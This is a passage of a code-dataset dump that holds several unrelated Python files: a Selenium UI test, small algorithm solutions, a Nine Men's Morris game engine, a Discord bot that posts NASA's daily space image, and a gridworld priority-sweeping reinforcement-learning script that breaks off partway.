self.driver.find_element(By.CLASS_NAME, 
\"set_new_department\").send_keys(Keys.RETURN)\n time.sleep(8)\n # MORE THAN ONE DEPARTMENT ADDED - VALIDATION\n department_item = self.driver.find_elements(By.CLASS_NAME, \"department_item\")\n print(len(department_item))\n assert len(department_item) >= 1\n # EDIT DEPARTMENT STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"editbtn_depstructure\").click()\n deletetestitem = self.driver.find_elements(By.CLASS_NAME, \"department_item\")\n for department_del in deletetestitem:\n depitem = department_del.text\n # print(depitem)\n if depitem == \"Department Test\":\n department_del.click()\n time.sleep(10)\n else:\n print(\"ALL Department Structure created are deleted now\")\n assert depitem != \"Department Test\"\n\n self.driver.find_element(By.CLASS_NAME, \"editbtn_depstructure\").click()\n time.sleep(5)\n\n # ADD NEW COMPANY STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").click()\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").send_keys(\"Company Location Test\")\n self.driver.find_element(By.CLASS_NAME, \"set_new_location\").send_keys(Keys.RETURN)\n time.sleep(8)\n # MORE THAN ONE COMPANY - VALIDATION\n compstruc_item = self.driver.find_elements(By.CLASS_NAME, \"companyloc_item\")\n print(len(compstruc_item))\n assert len(compstruc_item) >= 1\n # EDIT DEPARTMENT STRUCTURE\n self.driver.find_element(By.CLASS_NAME, \"editbtn_comploc\").click()\n delcompitems = self.driver.find_elements(By.CLASS_NAME, \"companyloc_item\")\n for company_del in delcompitems:\n companyitem = company_del.text\n if companyitem == \"Company Location Test\":\n company_del.click()\n time.sleep(10)\n else:\n print(\"ALL Company Locations created are deleted now\")\n assert companyitem != \"Company Location Test\"\n\n self.driver.find_element(By.CLASS_NAME, \"editbtn_comploc\").click()\n time.sleep(5)","repo_name":"jrodasscaledev/Tests-AmbitionProfile","sub_path":"tests/test_CompanyStructure.py","file_name":"test_CompanyStructure.py","file_ext":"py","file_size_in_byte":3223,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"2279774218","text":"arr = [18,7,6,12,15]\n#output = [-1,12,12,15,-1]\n\ndef nextGreatestElement(arr):\n nextgreatelemenlist = [-1 for i in range(len(arr))]\n stack = []\n stack.append(0)\n\n for k in range(1, len(arr)):\n while len(stack) != 0 and arr[k] > arr[stack[-1]]:\n index = stack.pop()\n nextgreatelemenlist[index] = arr[k]\n\n if arr[k] <= arr[stack[-1]]:\n stack.append(k)\n\n return nextgreatelemenlist\n\n\n\nresult = nextGreatestElement(arr)","repo_name":"karthiikselvam/payirchi","sub_path":"Stacks/nextgreatestelement.py","file_name":"nextgreatestelement.py","file_ext":"py","file_size_in_byte":479,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"26215074201","text":"# https://leetcode.com/problems/all-paths-from-source-to-target/\nclass Solution:\n def allPathsSourceTarget(self, graph: List[List[int]]) -> List[List[int]]:\n def dfs(graph, path, visited, idx, target, res):\n if idx == target:\n res.append(path[:])\n return\n for x in graph[idx]:\n if x == idx:\n continue\n if x in visited:\n continue\n path.append(x)\n visited.add(x)\n dfs(graph, path, visited, x, target, res)\n visited.remove(x)\n path.pop()\n\n res = []\n path = []\n visited = set()\n n = len(graph)\n\n path.append(0)\n visited.add(0)\n dfs(graph, path, visited, 0, n - 1, res)\n visited.remove(0)\n path.pop()\n\n return 
res\n","repo_name":"zhuli19901106/leetcode-zhuli","sub_path":"algorithms/0501-1000/0797_all-paths-from-source-to-target_1_AC.py","file_name":"0797_all-paths-from-source-to-target_1_AC.py","file_ext":"py","file_size_in_byte":884,"program_lang":"python","lang":"en","doc_type":"code","stars":557,"dataset":"github-code","pt":"72"}
{"seq_id":"40577446693","text":"\"\"\"Nine Men's Morris routines.\n   A) Class State\n      A specialization of the StateSpace Class that is tailored to the game of Nine Men's Morris.\n   B) class Direction\n      An encoding of the directions of movement that are possible for players in Nine Men's Morris.\n\"\"\"\n\nfrom copy import deepcopy\n# Copy a new board from the old board\n# without aliasing to the old board\n\nimport re\n\nclass State:\n    def __init__(self, player='u', is_new = False, grid=[], user_pieces_num=10, computer_pieces_num=10):\n        \"\"\"\n        Create a Nine Men's Morris state\n\n        player: the current player, 'u' (user) or 'c' (computer).\n        is_new: if we need to init the board.\n        grid: board.\n        piece_not_used: the number of pieces not yet placed on the grid.\n        Cell Types:\n        -1 means x (The cell is impossible to be reached by any player)\n        0 means empty (The cell is Unoccupied but is reachable by any player)\n        1 means u (The cell is currently occupied by the White player)\n        2 means c (The cell is currently occupied by the Black player)\n        \"\"\"\n        self.grid = []\n        self.cell_types = {-1: 'x', 0: '_', 1: '♘', 2: '♖'}\n\n        if player == 'c':\n            self.current_player = 'c'\n            self.current_player_key = 2\n            self.opponent = 'u'\n            self.opponent_player_key = 1\n        else: \n            self.current_player = 'u'\n            self.current_player_key = 1\n\n            self.opponent = 'c'\n            self.opponent_player_key = 2\n\n        if is_new:\n            self.grid = [\n                [0, -1, -1, 0, -1, -1, 0],\n                [-1, 0, -1, 0, -1, 0, -1],\n                [-1, -1, 0, 0, 0, -1, -1],\n                [0, 0, 0, -1, 0, 0, 0],\n                [-1, -1, 0, 0, 0, -1, -1],\n                [-1, 0, -1, 0, -1, 0, -1],\n                [0, -1, -1, 0, -1, -1, 0]\n            ]\n        else:\n            self.grid = grid\n        \n        if self.current_player_key == 1:\n            self.user_piece_not_used = user_pieces_num\n            self.computer_piece_not_used = computer_pieces_num\n            self.piece_not_used = self.user_piece_not_used\n        else:\n            self.computer_piece_not_used = computer_pieces_num\n            self.user_piece_not_used = user_pieces_num\n            self.piece_not_used = self.computer_piece_not_used\n\n        self.winner = None\n\n        if self.check_lose_state(self.grid, self.opponent_player_key): # check if the current player wins.\n            self.winner = self.current_player\n            self.over = True\n        else:\n            self.over = False\n\n\n    def check_lose_state(self, grid, player_key):\n        \"\"\"\n        Losing condition: \n        the player has only 2 pieces left on the board, or\n        the player cannot move\n        \n        player_key: the key of the player to check\n        \n        user: 1,\n        computer: 2\n\n        Return:\n        True: the player loses\n        False: the player does not lose (it does not mean it wins)\n        \"\"\"\n\n        if self.piece_not_used == 0 and self.pieces_left_onboard(player_key) == 2:\n            return True\n        else:\n            # or if the player cannot move, which only happens in Phases 2 and 3, not 1.\n            if self.piece_not_used == 0:\n                opponent_key = 1 if player_key == 2 else 2\n\n                # get_neighbors and check if the player can move.\n                all_blocked = True\n                all_cords = self.get_coords(player_key)\n                for cord in all_cords:\n                    its_neighbors = self.get_neighbors(cord)\n                    for neighbor in its_neighbors:\n                        if not self.grid[neighbor[0]][neighbor[1]] == opponent_key: # if any neighbor is not an opponent piece.\n                            all_blocked = False\n                            break\n                    if not all_blocked:\n                        break\n                return all_blocked\n            else:\n                return False\n    \n    def get_neighbors(self, piece_cord):\n        \"\"\"\n        Given a piece 
cordinates (x, y), output a dictionary of its neighbor cordinate tuples.\n\n Note that x is upper horizontal axis, and y is left vertical axis, say, (0, 0) is upper left corner.\n \"\"\"\n x = piece_cord[0]\n y = piece_cord[1]\n \n neighbors = []\n if x == 0 or x == 6:\n if y == 0 or y == 6:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 0))\n neighbors.append((x, 6))\n if x == 0: # (1, 3)\n neighbors.append((1, 3))\n elif x == 6: # (5, 3)\n neighbors.append((5, 3))\n elif x == 1 or x == 5:\n if y == 1 or y == 5:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 1))\n neighbors.append((x, 5))\n neighbors.append((x - 1, 3))\n neighbors.append((x + 1, 3))\n elif x == 2 or x == 4:\n if y == 2 or y == 4:\n neighbors.append((3, y))\n neighbors.append((x, 3))\n elif y == 3:\n neighbors.append((x, 2))\n neighbors.append((x, 4))\n if x == 2: # (2, 3)\n neighbors.append((1, 3))\n elif x == 4: # (4, 3)\n neighbors.append((5, 3))\n else: # x = 3\n if y == 0 or y == 6:\n neighbors.append((0, y))\n neighbors.append((6, y))\n if y == 0:\n neighbors.append((3, 1))\n elif y == 6: \n neighbors.append((3, 5))\n elif y == 1 or y == 5:\n neighbors.append((1, y))\n neighbors.append((5, y))\n neighbors.append((3, y - 1))\n neighbors.append((3, y + 1))\n elif y == 2 or y == 4:\n neighbors.append((2, y))\n neighbors.append((4, y))\n if y == 2: # (3, 2)\n neighbors.append((3, 1))\n elif y == 4: # (3, 5)\n neighbors.append((3, 5))\n # print(neighbors)\n return neighbors\n\n def get_neighbors_to_hash(self, piece_cord):\n lst = self.get_neighbors(piece_cord)\n res = {}\n for tup in lst:\n res[tup] = self.grid[tup[0]][tup[1]]\n return res\n\n def get_successors(self):\n \"\"\"\n Generate all the actions that can be performed from this state,\n and the states those actions will create.\n \n Pseudo-code:\n if not isAllUsed():\n place()\n else:\n if num_pieces > 3:\n move()\n elif num_pieces == 3:\n fly()\n elif num_pieces == 2:\n lose()\n # Means opponent wins\n else:\n raise error('Something is wrong')\n\n return get_next_states()\n \"\"\"\n\n successors = []\n\n if self.piece_not_used > 0: \n # Place\n for x in range(7):\n for y in range(7):\n if self.grid[x][y] == 0: # Unoccupied\n successors.append(('P', x, y))\n \n elif self.piece_not_used == 0:\n num_pieces = self.pieces_left_onboard(self.current_player_key)\n if num_pieces > 3:\n # Move\n coords = self.get_coords(self.current_player_key)\n for coord in coords:\n neighbors = self.get_neighbors_to_hash(coord)\n for neighbor in neighbors:\n x = neighbor[0]\n y = neighbor[1]\n if self.grid[x][y] == 0:\n successors.append(('M', x, y))\n # 'M' means to move a piece on the board\n # i.e. 
Place + Remove\n elif num_pieces == 3:\n # Fly\n for x in range(7):\n for y in range(7):\n if self.grid[x][y] == 0: # Unoccupied\n successors.append(('F', x, y))\n # 'F' means to fly a piece on the board\n # Similar to 'M' but when removing a piece,\n # we can remove any piece on the board\n # instead of in 'M' we have to remove its\n # neighbor (origin piece has also to be in its neighbors)\n elif num_pieces == 2:\n # Lose\n # It is checked in the next state\n # TODO: EFFICIENCY\n pass\n \n else:\n # Exception\n raise Exception('Number of pieces should be between 2-9, but found {}'.format(num_pieces))\n else:\n # Exception\n raise Exception('Piece not found should be >=0, but found {}'.format(piece_not_used))\n\n return self.get_next_states(successors)\n\n def get_next_states(self, instructions):\n \"\"\"\n Convert instruction and coordinates to actual state\n \"\"\"\n next_boards = []\n oppo_pieces_left = self.get_coords(self.opponent_player_key)\n\n for instruction, x, y in instructions:\n # instruction can be either P or M or F\n \n next_board = deepcopy(self.grid)\n\n # Place a piece\n next_board[x][y] = self.current_player_key\n\n # Get coords of pieces to be moved\n # according to the instruction\n if (instruction == 'P'): # Place\n # We do not remove pieces in \"Place\"\n # Just a placeholder for for-loop\n pieces = [('new','move')]\n elif (instruction == 'M'): # Move\n # Only neighbor pieces placed by the same player\n # can achieve the new state, thus remove it\n neighbors = self.get_neighbors_to_hash((x,y))\n pieces = list(filter(lambda key: neighbors[key] == self.current_player_key, neighbors))\n elif (instruction == 'F'): # Fly\n # Any pieces placed by the same player can be removed\n pieces = self.get_coords(self.current_player_key)\n else:\n # Error\n raise\n\n for x,y in pieces:\n\n new_board = deepcopy(next_board)\n\n # Move/Fly a piece means the same as\n # place a piece in a new coord (\"Place\")\n # and then remove the piece in the old coord (\"Remove\")\n # The \"Place\" has been finished above\n # the following just remove the old piece\n if instruction in ['M', 'F']:\n new_board[x][y] = 0\n\n # if (self.isMill(new_board, self.current_player_key)):\n # print(\"in computer get_next_state\", self.current_player_key)\n # print((sum(self.getMills(new_board, self.current_player_key)) > 0), (not self.getMills(new_board, self.current_player_key) == self.getMills(next_board, self.current_player_key)), (sum(self.getMills(new_board, self.current_player_key)) >= sum(self.getMills(next_board, self.current_player_key))))\n if (sum(self.getMills(new_board, self.current_player_key)) > 0) and \\\n (not self.getMills(new_board, self.current_player_key) == self.getMills(self.grid, self.current_player_key)) and \\\n (sum(self.getMills(new_board, self.current_player_key)) >= sum(self.getMills(self.grid, self.current_player_key))):\n\n # print(\"## Computer is forming a mill! 
##\")\n # Mill: Remove a piece from opponents\n # with each piece removed as a new board\n # print(\"computer choose user's pieces...\", oppo_pieces_left)\n for x,y in oppo_pieces_left:\n next_mill_board = deepcopy(new_board)\n # Remove the original piece\n next_mill_board[x][y] = 0\n next_boards.append(next_mill_board)\n \n else:\n # Just append it\n next_boards.append(new_board)\n return next_boards\n \n def get_coords(self, player):\n \"\"\"\n Get the coordinates for all the pieces of \"player\" on the board\n \"\"\"\n # Source:\n # https://stackoverflow.com/questions/27175400/how-to-find-the-index-of-a-value-in-2d-array-in-python\n return [(ix,iy) for ix, row in enumerate(self.grid) for iy, i in enumerate(row) if i == player]\n\n def pieces_left_onboard(self, player):\n \"\"\"\n Get number of pieces left on the board for @player\n >>> pieces_left_onboard(self, 1) # meaning user pieces.\n 2\n \"\"\"\n # Flatten the board from 2D to 1D\n flattened = [item for sublist in self.grid for item in sublist]\n return sum(list(map(lambda piece: 1 if piece == player else 0, flattened)))\n\n def isMill(self, grid, player):\n \"\"\"\n B is the 7*7 board\n player means the letter representation of the player\n e.g. w (for white) or b (for black)\n\n >>> isMill(b, 1) # 1 for user; 2 for computer.\n False\n \"\"\"\n b = grid\n all_mill_possibilities = [ # 16 possibilities\n # Outer 3\n [b[0][0], b[3][0], b[6][0]], # every 3 pieces form an \"m\"\n [b[0][0], b[0][3], b[0][6]],\n [b[0][6], b[3][6], b[6][6]],\n [b[6][0], b[6][3], b[6][6]],\n # Middle 3\n [b[1][1], b[3][1], b[5][1]],\n [b[1][1], b[1][3], b[1][5]],\n [b[1][5], b[3][5], b[5][5]],\n [b[5][1], b[5][3], b[5][5]],\n # Inner 3\n [b[2][2], b[3][2], b[4][2]],\n [b[2][2], b[2][3], b[2][4]],\n [b[2][4], b[3][4], b[4][4]],\n [b[4][2], b[4][3], b[4][4]],\n # Cross 3\n [b[0][3], b[1][3], b[2][3]],\n [b[3][0], b[3][1], b[3][2]],\n [b[3][4], b[3][5], b[3][6]],\n [b[4][3], b[5][3], b[6][3]]\n ]\n\n # \"lambda p: p == player\" means each piece (e.g. b[0][0]) \n # returns true if it is occupied by the argument \"player\"\n # \"all(list(map(lambda p: p == player, m)))\" means each mill condition \"m\"\n # returns true iff ALL of them (e.g. [b[0][0], b[3][0], b[6][0]]) are true\n # \"lambda m: all(list(map(lambda p: p == player, m)\" means whether\n # each m forms a mill\n # \"True in ...\" means the board forms a mill as long as one of them is a mill\n return True in list(map(lambda m: all(list(map(lambda p: p == player, m))), all_mill_possibilities))\n\n def getMills(self, grid, player):\n \"\"\"\n B is the 7*7 board\n player means the letter representation of the player\n e.g. w (for white) or b (for black)\n\n >>> millCount(b, 1) # 1 for user; 2 for computer.\n 2 # forms 2 mills for user pieces.\n \"\"\"\n b = grid\n all_mill_possibilities = [ # 16 possibilities\n # Outer 3\n [b[0][0], b[3][0], b[6][0]], # every 3 pieces form an \"m\"\n [b[0][0], b[0][3], b[0][6]],\n [b[0][6], b[3][6], b[6][6]],\n [b[6][0], b[6][3], b[6][6]],\n # Middle 3\n [b[1][1], b[3][1], b[5][1]],\n [b[1][1], b[1][3], b[1][5]],\n [b[1][5], b[3][5], b[5][5]],\n [b[5][1], b[5][3], b[5][5]],\n # Inner 3\n [b[2][2], b[3][2], b[4][2]],\n [b[2][2], b[2][3], b[2][4]],\n [b[2][4], b[3][4], b[4][4]],\n [b[4][2], b[4][3], b[4][4]],\n # Cross 3\n [b[0][3], b[1][3], b[2][3]],\n [b[3][0], b[3][1], b[3][2]],\n [b[3][4], b[3][5], b[3][6]],\n [b[4][3], b[5][3], b[6][3]]\n ]\n\n # \"lambda p: p == player\" means each piece (e.g. 
b[0][0]) \n        # returns true if it is occupied by the argument \"player\"\n        # \"all(list(map(lambda p: p == player, m)))\" means each mill condition \"m\"\n        # returns true iff ALL of them (e.g. [b[0][0], b[3][0], b[6][0]]) are true\n        # \"lambda m: all(list(map(lambda p: p == player, m)\" means whether\n        # each m forms a mill\n        # the returned list records, for each of the 16 lines, whether it forms a mill for \"player\"\n        return list(map(lambda m: all(list(map(lambda p: p == player, m))), all_mill_possibilities))\n    \n    # def hashable_state(self):\n    #     \"\"\"\n    #     Return a data item that can be used as a dictionary key to UNIQUELY represent a state.\n    #     \"\"\"\n    #     return hash((self.robot, frozenset(self.snowballs.items())))\n\n\n    def state_string(self):\n        \"\"\"\n        Return a string representation of a state that can be printed to stdout.\n        \"\"\"\n        return self.grid\n\n    def instructions(self):\n        \"\"\"\n        Given the game phase, return the matching game instructions.\n        \"\"\"\n        if self.piece_not_used > 0:\n            return \"Pieces not used up yet, give a position to put the piece on.\"\n        elif self.piece_not_used == 0 and self.pieces_left_onboard(self.current_player_key) > 2:\n            return \"Only allow moving the pieces.\"\n\n    def __str__(self):\n        \"\"\"\n        Print the string representation of the state.\n        \"\"\"\n        result = ''\n        for i in range(7):\n            for j in range(7):\n                result += ' ' + self.cell_types[self.grid[i][j]] + ' '\n            result += '\\n'\n        return result\n\n    def printGrid(self, grid):\n        \"\"\"\n        Print the string representation of the state.\n        \"\"\"\n        result = ''\n        for i in range(7):\n            for j in range(7):\n                result += self.cell_types[grid[i][j]] + ' '\n            result += '\\n'\n        return result\n    \n    def get_move(self, phase):\n\n        if phase == 1:\n            while True:\n                new_move = input(\"Please type the coordinates of your position, e.g. 0,2, meaning (0, 2) of the grid; note that the grid's origin sits at the upper left corner.\\n\")\n                if re.match(r\"\\d,\\s*\\d\", new_move):\n                    break\n                else:\n                    print(\"Incorrect input, please try again.\")\n            x = int(new_move.split(\",\")[0])\n            y = int(new_move.split(\",\")[1])\n\n            self.user_piece_not_used = max(self.user_piece_not_used - 1, 0)\n            print(\"user remained...\", self.user_piece_not_used, \"; computer remained...\", self.computer_piece_not_used)\n\n            return (-1, -1), (y, x) # use (-1, -1) to represent placing a new piece.\n        elif phase == 2 or phase == 3:\n            while True:\n                target_piece = input(\"Select the piece by inputting its coordinates.\")\n                if re.match(r\"\\d,\\s*\\d\", target_piece):\n                    break\n                else:\n                    print(\"Incorrect input, please try again.\")\n            target_x = int(target_piece.split(\",\")[0])\n            target_y = int(target_piece.split(\",\")[1])\n            while True:\n                new_move = input(\"Please type the coordinates of your intended new position for the target piece at ({}, {}).\".format(target_x, target_y))\n                if re.match(r\"\\d,\\s*\\d\", new_move):\n                    break\n                else:\n                    print(\"Incorrect input, please try again.\")\n            move_x = int(new_move.split(\",\")[0])\n            move_y = int(new_move.split(\",\")[1])\n\n            self.user_piece_not_used = max(self.user_piece_not_used - 1, 0)\n            print(\"user remained...\", self.user_piece_not_used, \"; computer remained...\", self.computer_piece_not_used)\n\n            return (target_y, target_x), (move_y, move_x)\n\n\n    \n\n    def is_valid_move(self, cord, phase, target = (-1, -1)):\n        \"\"\"\n        Check if new_move's cord is valid given its current phase.\n        \"\"\"\n        if phase == 1:\n            # place phase.\n            return cord in self.get_coords(0)\n\n        elif phase == 2:\n            # move phase.\n            # 1. target piece should be current player's piece \n            # 2. target cord should be empty and one of the target's neighbors.\n            is_belong_player = self.grid[target[0]][target[1]] == self.current_player_key\n            is_at_neighbor = cord in self.get_neighbors(target)\n\n            print(target, self.get_neighbors(target))\n\n            is_empty = cord in self.get_coords(0)\n            # print(\"check is valid move...\", is_belong_player, is_at_neighbor, is_empty)\n            return is_belong_player and is_at_neighbor and is_empty\n\n        elif phase == 3:\n            # fly phase.\n            # 1. target piece should be current player's piece \n            # 2. target cord should be empty.\n            is_belong_player = self.grid[target[0]][target[1]] == self.current_player_key\n            is_empty = cord in self.get_coords(0)\n            return is_belong_player and is_empty\n\n    def apply_target_and_move(self, target, new_move):\n        \"\"\"\n        Given the current State, apply the new target piece and new_move coordinates to produce a new State.\n\n        1. the target and new_move must already be valid here, even if not optimal.\n        2. Should handle the isMill situation here. \n        Especially for user, ask for which piece to remove;\n        for computer side, temporarily pick a random piece to remove.\n        \"\"\"\n        # print(\"new_move...\", new_move)\n        if target == (-1, -1):\n            # in Phase 1, place a new piece at new_move position.\n            new_grid = deepcopy(self.grid)\n            new_grid[new_move[0]][new_move[1]] = self.current_player_key\n        else:\n            # in Phase 2 or 3, place a piece at new_move and clear the target position.\n            new_grid = deepcopy(self.grid)\n            new_grid[target[0]][target[1]] = 0\n            new_grid[new_move[0]][new_move[1]] = self.current_player_key\n        \n        # print(\"New game state after applying move...\", printGrid(new_grid))\n        \n        if (sum(self.getMills(new_grid, self.current_player_key)) > 0) and \\\n            (not self.getMills(new_grid, self.current_player_key) == self.getMills(self.grid, self.current_player_key)) and \\\n            (sum(self.getMills(new_grid, self.current_player_key)) >= sum(self.getMills(self.grid, self.current_player_key))):\n            # if \n            # 1. new_grid has a mill, &&\n            # 2. new_grid's mill distribution is not equal to self.grid's, &&\n            # 3. new_grid's mill count is greater than or equal to self.grid's.\n\n            # check if the current grid forms a mill. For user, ask which one to remove; for computer, use functions from strategy heuristics.\n            # print(\"applying move...check for mill\", self.isMill(new_grid, self.current_player_key))\n            tmp = \"User\" if self.current_player == 'u' else \"Computer\"\n            print(\"## {} is forming a mill! ##\".format(tmp))\n            # print(\"current grid...\", new_grid)\n            if self.current_player == 'u':\n                # User picks a piece to remove; validate the input before parsing it.\n                while True:\n                    target_piece = input(\"Select one opponent's piece to remove.\")\n                    if not re.match(r\"\\d,\\s*\\d\", target_piece):\n                        print(\"Incorrect input, please try again.\")\n                        continue\n                    target_x = int(target_piece.split(\",\")[0])\n                    target_y = int(target_piece.split(\",\")[1])\n                    if new_grid[target_y][target_x] == self.opponent_player_key:\n                        break\n                    else:\n                        print(\"Incorrect input, please try again.\")\n                new_grid[target_y][target_x] = 0\n            else:\n                # Computer picks a piece by strategy.\n                print(\"Computer will pick a piece by strategy...\")\n\n            \n\n        return State(self.opponent, is_new = False, grid = new_grid, user_pieces_num = self.user_piece_not_used, computer_pieces_num = self.computer_piece_not_used)\n\n\nif __name__ == '__main__':\n    new_state = State()\n    print(new_state.get_coords(1))","repo_name":"yanrs17/nine-mens-morris-solver","sub_path":"state.py","file_name":"state.py","file_ext":"py","file_size_in_byte":24370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"963126724","text":"import discord\nimport requests\nimport datetime\nimport dateutil.tz as dateutils\nimport time as tim\nimport re\nfrom discord.ext import commands, tasks\nfrom bs4 import BeautifulSoup\n\n\nasync def setup(bot):\n    await bot.add_cog(space_images(bot))\n\n\ndef get_the_time():\n    if tim.localtime().tm_isdst:\n        BG_tz = dateutils.tzoffset('UTC', 60 * 60 * 3)\n    else:\n        BG_tz = dateutils.tzoffset('UTC', 60 * 60 * 2)\n\n    return datetime.time(hour = 8,\\\n                        minute = 0,\\\n                        second = 15,\\\n                        tzinfo = BG_tz)\n\n\nclass space_images(commands.Cog):\n    def __init__(self, bot):\n        self.bot = bot\n\n\n    the_time = get_the_time()\n\n\n    async def get_space_img(self):\n        response = requests.get(\"https://apod.nasa.gov/apod/astropix.html\")\n        soup = BeautifulSoup(response.text, \"html.parser\")\n        list_of_links = soup.find_all('a')\n\n        data = []\n        image_links = []\n\n        for link in list_of_links:\n            if re.search(\"image\", str(link)) != None:\n                image_links.append(re.search(\"image\", str(link)).string)\n\n        image_link = re.split('href=\"', image_links[0])[1]\n        image_link = re.split('\"', image_link)[0]\n\n        data.append(\"https://apod.nasa.gov/apod/\" + image_link)\n\n        title = re.split(\"Image Credit\", soup.find_all('center')[1].text)[0]\n        title = re.sub(\"\\n\", \" \", title).strip(\" \")\n\n        data.append(title)\n\n        explanation = None\n\n        list_of_ps = soup.find_all('p')\n\n        for paragraph in list_of_ps:\n            if re.search(\"Explanation\", paragraph.text) != None:\n                explanation = re.split(\"Explanation:\", paragraph.text)[1]\n                explanation = re.split(\"Tomorrow\", explanation)[0]\n                explanation = re.sub(\"\\n\", \" \", explanation).strip(\" \")\n\n        # print(type(explanation), explanation)\n        data.append(explanation)\n\n        return data\n\n\n    @commands.command( name = 'space_image',\n                    help = 'The bot shows the daily space image from NASA.',\n                    brief = '- Shows the daily space image from NASA.')\n    async def space_image_cmd(self, ctx):\n        try:\n            space_img_info = await self.get_space_img()\n            explanation = \"\"\n            # print(space_img_info[0], \"|\", space_img_info[1], \"|\", space_img_info[2])\n\n            if len(space_img_info[2]) < 1024:\n                explanation = space_img_info[2]\n            else:\n                explanation = \"https://apod.nasa.gov/apod/astropix.html\"\n            \n            embed = discord.Embed(title = space_img_info[1])\n            embed.set_image(url = space_img_info[0])\n            embed.add_field(name = \"Description\",\n                            value = explanation,\n                            inline = False)\n            \n            await ctx.send(embed = 
embed)\n except Exception as e:\n await ctx.send(\"[space_images] I broke down again\")\n await ctx.send(\"https://tenor.com/view/serio-no-nop-robot-robot-down-gif-12270251\")\n \n text_chan = self.bot.get_channel(548554244932894750)\n await text_chan.send(e)\n \n return\n \n @tasks.loop(time = the_time)\n async def good_morning_message(self):\n text_chan = self.bot.get_channel(337156974754136064)\n try:\n space_img_info = await self.get_space_img()\n explanation = \"\"\n # print(space_img_info[0], \"|\", space_img_info[1], \"|\", space_img_info[2])\n\n if len(space_img_info[2]) < 1024:\n explanation = space_img_info[2]\n else:\n explanation = \"https://apod.nasa.gov/apod/astropix.html\"\n \n embed = discord.Embed(title = space_img_info[1])\n embed.set_image(url = space_img_info[0])\n embed.add_field(name = \"Description\",\n value = explanation,\n inline = False)\n \n await text_chan.send(embed = embed)\n except Exception as e:\n await text_chan.send(\"[space_images] I broke down again\")\n await text_chan.send(\"https://tenor.com/view/serio-no-nop-robot-robot-down-gif-12270251\")\n \n text_chan = self.bot.get_channel(548554244932894750)\n await text_chan.send(e)\n \n self.the_time = get_the_time()\n self.good_morning_message.change_interval(time = self.the_time)\n\n return\n\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(\"space_images module is loaded.\")\n self.good_morning_message.start()\n\n\n @commands.command( name = 'tnext_si',\n help = 'The bot will print the time of the next space image.',\n brief = '- Prints the time of the next scheduled space image.')\n async def get_next_iteration(self, ctx):\n await ctx.send(\"I am scheduled to give you the next space image on \" +\\\n str(self.good_morning_message.next_iteration))\n\n","repo_name":"Dimitarleomitkov/DiscordListManagementBot","sub_path":"cogs/space_images.py","file_name":"space_images.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29972743181","text":"import heapq\nimport random\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nnum_rows = 5\nnum_cols = 5\n\nv_op = np.array([\n [4.0187, 4.5548, 5.1575, 5.8336, 6.4553],\n [4.3716, 5.0324, 5.8013, 6.6473, 7.3907],\n [3.8672, 4.3900, 0.0000, 7.5769, 8.4637],\n [3.4182, 3.8319, 0.0000, 8.5738, 9.6946],\n [2.9977, 2.9309, 6.0733, 9.6946, 0.0000]\n])\n\ndef oneDIdx(i, j):\n return int(i*num_rows + j)\n\ndef upIdx(s, i, j):\n if (i == 0) or (s == 22):\n return s\n return oneDIdx(i-1, j)\n\ndef rightIdx(s, i, j):\n if (j == num_cols-1) or (s == 11) or (s == 16):\n return s\n return oneDIdx(i, j+1)\n\ndef leftIdx(s, i, j):\n if (j == 0) or (s == 13) or (s == 18):\n return s\n return oneDIdx(i, j-1)\n\ndef downIdx(s, i, j):\n if (i == num_rows-1) or (s == 7):\n return s\n return oneDIdx(i+1, j)\n\ndef idIdx(s, i, j):\n return s\n\nact_dist = {\n 0 : {'a': [rightIdx, upIdx, downIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 1 : {'a': [leftIdx, upIdx, downIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 2 : {'a': [upIdx, rightIdx, leftIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]},\n 3 : {'a': [downIdx, rightIdx, leftIdx, idIdx], 'p': [0.8, 0.05, 0.05, 0.1]}\n }\n\ndef getState(cur_state, cur_act):\n\n act_to_func = {\n 0 : rightIdx,\n 1 : leftIdx,\n 2 : upIdx,\n 3 : downIdx\n }\n\n i = cur_state // num_rows\n j = cur_state % num_rows\n\n return act_to_func[cur_act](cur_state, i, j)\n\ndef getAllStates(cur_state, cur_act):\n st_list = []\n i = cur_state // num_rows\n 
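# NOTE: the flat state id satisfies s = i*num_rows + j (see oneDIdx above), so\n    # floor-division and modulo recover (i, j); this relies on the grid being\n    # square (num_rows == num_cols == 5).\n    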
j = cur_state % num_rows\n for av in range(4):\n s = act_dist[cur_act]['a'][av](cur_state, i, j)\n r = getReward(s)\n st_list.append((act_dist[cur_act]['p'][av], s, r))\n\n return st_list\n\n\ndef getAction(state, q, eps):\n max_act = max(q[state])\n max_act_ct = np.count_nonzero(q[state] == max_act)\n prob = [((1-eps)/max_act_ct)+(eps/4) if av == max_act else eps/4 for av in q[state]]\n return random.choices(population=[0, 1, 2, 3], weights=prob)[0]\n\ndef getPolicy(q, eps):\n pi = []\n for state in range(num_rows*num_cols):\n max_act = max(q[state])\n max_act_ct = np.count_nonzero(q[state] == max_act)\n pi.append([((1-eps)/max_act_ct)+(eps/4) if av == max_act else eps/4 for av in q[state]])\n return pi\n\ndef getReward(state):\n if state == 24:\n return 10\n elif state == 22:\n return -10\n return 0\n\ndef prioritySweep(eps, theta, max_iter):\n \n mse_list = []\n\n pq = []\n def priorityQueuePush(new_p, state):\n for idx, (old_p, s) in enumerate(pq):\n if s == state:\n if old_p <= new_p:\n break\n pq[idx] = (new_p, state)\n heapq.heapify(pq)\n break\n else:\n heapq.heappush(pq, (new_p, state))\n\n q = np.zeros((num_rows*num_cols, 4), dtype=\"float\")\n gamma = 0.9\n\n pred = {}\n for state in 